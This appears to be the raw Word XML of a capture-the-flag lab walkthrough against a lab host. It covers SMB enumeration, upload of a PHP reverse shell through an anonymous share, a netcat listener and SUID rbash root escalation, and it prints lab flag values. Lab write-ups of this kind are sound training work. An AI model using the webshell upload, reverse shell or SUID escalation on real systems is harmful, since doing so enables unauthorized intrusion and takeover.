      <w:r w:rsidRPr="00EA2289">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EA2289">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EA2289">
        <w:t>sC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EA2289">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EA2289">
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EA2289">
        <w:t xml:space="preserve"> target2.ine.local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D4AF58E" w14:textId="56F4344B" w:rsidR="00EA2289" w:rsidRDefault="00EA2289" w:rsidP="00562D40">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="718704F9" wp14:editId="307A6D8A">
            <wp:extent cx="5727994" cy="4051508"/>
            <wp:effectExtent l="0" t="0" r="6350" b="6350"/>
            <wp:docPr id="18016682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68264" name="Picture 18016682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994" cy="405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BF07" w14:textId="77777777" w:rsidR="00EA2289" w:rsidRDefault="00EA2289" w:rsidP="00562D40"/>
    <w:p w14:paraId="1CC9E617" w14:textId="423FB462" w:rsidR="00EA2289" w:rsidRDefault="00EA2289" w:rsidP="00562D40">
      <w:r w:rsidRPr="00EA2289">
        <w:lastRenderedPageBreak/>
        <w:t>HTTP and SMB services are running</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327F3B09" w14:textId="77777777" w:rsidR="00EA2289" w:rsidRDefault="00EA2289" w:rsidP="00562D40">
      <w:r w:rsidRPr="00EA2289">
        <w:t>use enum4linux to enumerate the SMB service with the command: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604911A5" w14:textId="27603FE0" w:rsidR="00EA2289" w:rsidRDefault="00EA2289" w:rsidP="00562D40">
      <w:r w:rsidRPr="00EA2289">
        <w:t>enum4linux -a target2.ine.local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C663085" w14:textId="2026AD0D" w:rsidR="00EA2289" w:rsidRDefault="00EA2289" w:rsidP="00562D40">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="06C986C5" wp14:editId="4FE35B0A">
            <wp:extent cx="5766096" cy="2971953"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="981963952" name="Picture 16" descr="A computer screen with white text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63952" name="Picture 16" descr="A computer screen with white text and blue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096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7D71" w14:textId="3AAEBF3E" w:rsidR="00EA2289" w:rsidRDefault="00EA2289" w:rsidP="00562D40">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5CEB935A" wp14:editId="2F56C6C3">
            <wp:extent cx="5918504" cy="3340272"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="2070291110" name="Picture 1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91110" name="Picture 17" descr="A screenshot of a computer program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504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6B1F" w14:textId="77777777" w:rsidR="00EA2289" w:rsidRDefault="00EA2289" w:rsidP="00562D40"/>
    <w:p w14:paraId="5529A013" w14:textId="78A94234" w:rsidR="00EA2289" w:rsidRDefault="00EA2289" w:rsidP="00562D40">
      <w:r w:rsidRPr="00EA2289">
        <w:t>there is one share with mapping and listing enabled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65899B25" w14:textId="77777777" w:rsidR="00EA2289" w:rsidRDefault="00EA2289" w:rsidP="00562D40">
      <w:r w:rsidRPr="00EA2289">
        <w:lastRenderedPageBreak/>
        <w:t>connect to it using: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22ADEF47" w14:textId="77777777" w:rsidR="00EA2289" w:rsidRDefault="00EA2289" w:rsidP="00562D40">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EA2289">
        <w:t>smbclient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EA2289">
        <w:t xml:space="preserve"> //target2.ine.local/site-uploads </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752320B5" w14:textId="6B11BDDE" w:rsidR="00EA2289" w:rsidRDefault="00EA2289" w:rsidP="00562D40">
      <w:r w:rsidRPr="00EA2289">
        <w:t>and enter a blank password when prompted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EBB41D0" w14:textId="33B3CB83" w:rsidR="00EA2289" w:rsidRDefault="00EA2289" w:rsidP="00562D40">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13933B68" wp14:editId="595A5738">
            <wp:extent cx="4788146" cy="889046"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="335716625" name="Picture 18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16625" name="Picture 18" descr="A black background with white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88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DAB3" w14:textId="77777777" w:rsidR="00EA2289" w:rsidRDefault="00EA2289" w:rsidP="00562D40"/>
    <w:p w14:paraId="1D98FC36" w14:textId="77777777" w:rsidR="00EA2289" w:rsidRDefault="00EA2289" w:rsidP="00562D40">
      <w:r w:rsidRPr="00EA2289">
        <w:t xml:space="preserve">anything we upload here reflects on the website, let's upload our malicious file to the SMB server by copying the PHP shell with the </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F25B4A3" w14:textId="77777777" w:rsidR="00EA2289" w:rsidRDefault="00EA2289" w:rsidP="00562D40">
      <w:r w:rsidRPr="00EA2289">
        <w:t>command: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CED018" w14:textId="11107358" w:rsidR="00EA2289" w:rsidRDefault="00EA2289" w:rsidP="00562D40">
      <w:r w:rsidRPr="00EA2289">
        <w:t>cp /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EA2289">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EA2289">
        <w:t>/share/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EA2289">
        <w:t>webshells</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EA2289">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EA2289">
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EA2289">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EA2289">
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EA2289">
        <w:t>-reverse-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EA2289">
        <w:t>shell.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EA2289">
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E06E3D" w14:textId="2DE35E8D" w:rsidR="00EA2289" w:rsidRDefault="00EA2289" w:rsidP="00562D40">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="06AF12E7" wp14:editId="5A462A97">
            <wp:extent cx="5073911" cy="450873"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="21244009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00954" name="Picture 212440095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5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CB5F" w14:textId="0875819A" w:rsidR="00EA2289" w:rsidRDefault="00EA2289" w:rsidP="00562D40">
      <w:r w:rsidRPr="00EA2289">
        <w:t>modify the IP and port </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635D6F03" w14:textId="3A0C2E94" w:rsidR="00EA2289" w:rsidRDefault="00EA2289" w:rsidP="00562D40">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0063C6C0" wp14:editId="5253513C">
            <wp:extent cx="4019757" cy="425472"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="9942130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13011" name="Picture 99421301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F35F" w14:textId="1774D817" w:rsidR="00EA2289" w:rsidRDefault="00EA2289" w:rsidP="00562D40">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7892A432" wp14:editId="38C68840">
            <wp:extent cx="5702593" cy="2940201"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="981450581" name="Picture 20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50581" name="Picture 20" descr="A computer screen shot of a program cod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468C" w14:textId="722F6FDE" w:rsidR="00EA2289" w:rsidRDefault="00293F4B" w:rsidP="00562D40">
      <w:r>
        <w:t>Upload it to the website:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543A2F7A" w14:textId="6D18EA36" w:rsidR="00293F4B" w:rsidRDefault="00293F4B" w:rsidP="00562D40">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Put </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-reverse-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shell.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3397A162" w14:textId="1C567AA0" w:rsidR="00293F4B" w:rsidRDefault="00293F4B" w:rsidP="00562D40">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3CAAFAA8" wp14:editId="6F8E6B38">
            <wp:extent cx="5689892" cy="1428823"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="1549311832" name="Picture 2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11832" name="Picture 22" descr="A screen shot of a computer code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892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6806" w14:textId="5E219778" w:rsidR="00293F4B" w:rsidRDefault="00293F4B" w:rsidP="00562D40">
      <w:r>
        <w:t xml:space="preserve">Set the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> listener to get the reverse-shell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A0CEC9" w14:textId="5851D64F" w:rsidR="00293F4B" w:rsidRDefault="00293F4B" w:rsidP="00562D40">
      <w:r>
        <w:t>Nc -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nvlp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 1234</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C895E03" w14:textId="6FF785D8" w:rsidR="00293F4B" w:rsidRDefault="00293F4B" w:rsidP="00562D40">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0949DF43" wp14:editId="4F4DC3E2">
            <wp:extent cx="2762392" cy="774740"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="2121437955" name="Picture 2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37955" name="Picture 23" descr="A black background with white text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7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D8EA" w14:textId="1583493D" w:rsidR="00293F4B" w:rsidRDefault="00293F4B" w:rsidP="00562D40">
      <w:r>
        <w:t>Visit the uploaded data on the browser then we will get the reverse shell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7353F0D7" w14:textId="352AF940" w:rsidR="00293F4B" w:rsidRDefault="00293F4B" w:rsidP="00562D40">
      <w:r w:rsidRPr="00293F4B">
        <w:t>http://target2.ine.local/site-uploads/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787EC4CE" w14:textId="6AFB1C50" w:rsidR="00293F4B" w:rsidRDefault="00293F4B" w:rsidP="00562D40">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E7A0F1E" wp14:editId="3EE3FA3E">
            <wp:extent cx="4985006" cy="3079908"/>
            <wp:effectExtent l="0" t="0" r="6350" b="6350"/>
            <wp:docPr id="177567323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7323" name="Picture 24" descr="A screen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307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AC4B" w14:textId="29AB3AF7" w:rsidR="00293F4B" w:rsidRDefault="00293F4B" w:rsidP="00562D40">
      <w:r>
        <w:t xml:space="preserve">Click on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00293F4B">
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00293F4B">
        <w:t>-reverse-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00293F4B">
        <w:t>shell.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> get the reverse-shell on the listener:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47CF828D" w14:textId="2819C4AE" w:rsidR="00293F4B" w:rsidRDefault="00231B72" w:rsidP="00562D40">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F9B1BCD" wp14:editId="489A9310">
            <wp:extent cx="5823249" cy="1854295"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="1514404706" name="Picture 2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04706" name="Picture 25" descr="A computer screen with white text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249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86CB" w14:textId="022D0C7B" w:rsidR="00293F4B" w:rsidRDefault="00231B72" w:rsidP="00562D40">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15446B48" wp14:editId="41C6CB64">
            <wp:extent cx="3295819" cy="4464279"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1145693844" name="Picture 2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93844" name="Picture 26" descr="A screen shot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A9DF" w14:textId="6DDD1891" w:rsidR="00293F4B" w:rsidRDefault="00A968FE" w:rsidP="00562D40">
      <w:r w:rsidRPr="00A968FE">
        <w:t>FLAG3{0ccf604474a54e308c38847c73265900}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0395750A" w14:textId="2DEB5FA9" w:rsidR="00A968FE" w:rsidRPr="00562D40" w:rsidRDefault="00A968FE" w:rsidP="00562D40">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="39C1951C" wp14:editId="302F235F">
            <wp:extent cx="3930852" cy="1479626"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="2099764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6492" name="Picture 20997649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4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EE2E" w14:textId="77777777" w:rsidR="00562D40" w:rsidRDefault="00562D40" w:rsidP="00562D40">
      <w:r w:rsidRPr="00562D40">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Flag 4:</w:t>
      </w:r>
      <w:r w:rsidRPr="00562D40">
        <w:t> Can you escalate to root on </w:t>
      </w:r>
      <w:r w:rsidRPr="00562D40">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>target2.ine.local</w:t>
      </w:r>
      <w:r w:rsidRPr="00562D40">
        <w:t> and read the flag from the restricted /root directory?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564CCEFA" w14:textId="1895815B" w:rsidR="00562D40" w:rsidRPr="00562D40" w:rsidRDefault="00562D40" w:rsidP="00562D40">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Solution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060B3946" w14:textId="212212A7" w:rsidR="00562D40" w:rsidRDefault="00A968FE">
      <w:r w:rsidRPr="00A968FE">
        <w:t>we needed root access. We enumerated available shells with elevated privileges:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C08DA5D" w14:textId="14DC15FD" w:rsidR="00A968FE" w:rsidRDefault="00A968FE">
      <w:r w:rsidRPr="00A968FE">
        <w:t>cat /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A968FE">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A968FE">
        <w:t>/shells | while read shell; do ls -l $shell 2&gt;/dev/null; done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76863525" w14:textId="77777777" w:rsidR="00F876B6" w:rsidRDefault="00F876B6"/>
    <w:p w14:paraId="3EFD420F" w14:textId="08FA380B" w:rsidR="00A968FE" w:rsidRDefault="00A968FE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0244B359" wp14:editId="0A986202">
            <wp:extent cx="5778797" cy="1270065"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="1181205366" name="Picture 2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05366" name="Picture 28" descr="A screen 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10F7" w14:textId="0AD6B496" w:rsidR="00A968FE" w:rsidRDefault="00A968FE">
      <w:r w:rsidRPr="00A968FE">
        <w:t> /bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A968FE">
        <w:t>rbash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A968FE">
        <w:t xml:space="preserve"> had the SUID bit set (it could execute as root).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC226BE" w14:textId="77777777" w:rsidR="00A968FE" w:rsidRDefault="00A968FE"/>
    <w:p w14:paraId="35EE0103" w14:textId="7868D95C" w:rsidR="00A968FE" w:rsidRDefault="00A968FE">
      <w:r w:rsidRPr="00A968FE">
        <w:t>find / -exec /bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A968FE">
        <w:t>rbash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A968FE">
        <w:t xml:space="preserve"> -p \; -quit 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46687B71" w14:textId="77777777" w:rsidR="00A968FE" w:rsidRDefault="00A968FE"/>
    <w:p w14:paraId="5FEAF45C" w14:textId="3D95D8D8" w:rsidR="00F876B6" w:rsidRDefault="00F876B6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="38ACA272" wp14:editId="7E416FA1">
            <wp:extent cx="5061210" cy="495325"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="99936674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66746" name="Picture 99936674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210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906A" w14:textId="3980D89A" w:rsidR="00F876B6" w:rsidRDefault="00F876B6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F025321" wp14:editId="125C0FB2">
            <wp:extent cx="4248368" cy="997001"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="204844083" name="Picture 30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4083" name="Picture 30" descr="A black background with white text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3C20" w14:textId="3CCED1F6" w:rsidR="00F876B6" w:rsidRDefault="00F876B6">
      <w:r w:rsidRPr="00F876B6">
        <w:t>FLAG4{988fa666a57544568d87c3734f832363}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3F9895" w14:textId="1049F53F" w:rsidR="00F876B6" w:rsidRDefault="00F876B6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00523CD2" wp14:editId="0C80E4D1">
            <wp:extent cx="3988005" cy="1073205"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1526998137" name="Picture 3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98137" name="Picture 31" descr="A black background with white text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D2C88"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2192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114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5B3"/>
    <w:rsid w:val="001855B3"/>
    <w:rsid w:val="001927F5"/>
    <w:rsid w:val="00231B72"/>
    <w:rsid w:val="00293F4B"/>
    <w:rsid w:val="002B370C"/>
    <w:rsid w:val="00307D55"/>
    <w:rsid w:val="00390074"/>
    <w:rsid w:val="00551663"/>
    <w:rsid w:val="00562D40"/>
    <w:rsid w:val="00595B1E"/>
    <w:rsid w:val="005B6ACB"/>
    <w:rsid w:val="0067612F"/>
    <w:rsid w:val="00853ABF"/>
    <w:rsid w:val="00A033E1"/>
    <w:rsid w:val="00A968FE"/>
    <w:rsid w:val="00AE0EAE"/>
    <w:rsid w:val="00BD63B4"/>
    <w:rsid w:val="00BE6022"/>
    <w:rsid w:val="00EA2289"/>
    <w:rsid w:val="00F876B6"/>
    <w:rsid w:val="00FA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4773E"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{2D4C0780-DC4F-4DD1-AD14-280732495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theme" Target="theme/theme1.xml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fontTable" Target="fontTable.xml"/><Relationship Id="rId8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14</Pages>
  <Words>581</Words>
  <Characters>3334</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>130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20</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-12-05T11:43:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-05T14:03:00Z</dcterms:modified>
</cp:coreProperties>
</file>